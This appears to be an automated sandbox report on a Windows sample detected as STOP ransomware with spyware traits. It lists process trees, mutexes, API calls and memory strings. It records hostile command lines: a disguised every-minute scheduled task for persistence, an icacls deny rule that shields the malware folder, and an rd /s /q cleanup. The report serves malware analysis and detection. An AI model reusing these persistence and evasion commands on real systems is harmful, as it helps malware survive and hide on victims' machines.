Source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@58/276@14/13

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

10_2_00411900

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02E52564 CreateToolhelp32Snapshot,Module32First,

0_2_02E52564

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

10_2_0040D240

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rujtcgu

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\C002.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "

Source: unknown

Process created: C:\Windows\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: pU	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Admin	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsAutoStart	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsTask	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --ForNetRes	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsAutoStart	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsTask	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Task	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --AutoStart	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Service	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: X1P	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Admin	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: runas	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: x2Q	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: x*P	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: C:\Windows\	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: D:\Windows\	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: 7P	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: %username%	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: F:\	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: pU	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Admin	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsAutoStart	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsTask	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --ForNetRes	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsAutoStart	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: IsTask	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Task	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --AutoStart	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Service	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: X1P	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: --Admin	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: runas	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: x2Q	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: x*P	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: C:\Windows\	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: D:\Windows\	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: 7P	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: %username%	10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Command line argument: F:\	10_2_00419F90

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000013.00000003.2340668890.0000000000909000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	ReversingLabs: Detection: 31%
Source: file.exe	Virustotal: Detection: 43%

Source: E609.exe	String found in binary or memory: set-addPolicy
Source: E609.exe	String found in binary or memory: id-cmc-addExtensions
Source: E609.exe	String found in binary or memory: set-addPolicy
Source: E609.exe	String found in binary or memory: id-cmc-addExtensions
Source: E609.exe	String found in binary or memory: set-addPolicy
Source: E609.exe	String found in binary or memory: id-cmc-addExtensions
Source: E609.exe	String found in binary or memory: id-cmc-addExtensions

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rujtcgu C:\Users\user\AppData\Roaming\rujtcgu
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C01.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rujtcgu C:\Users\user\AppData\Roaming\rujtcgu
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wininet.dll	Jump to behavior
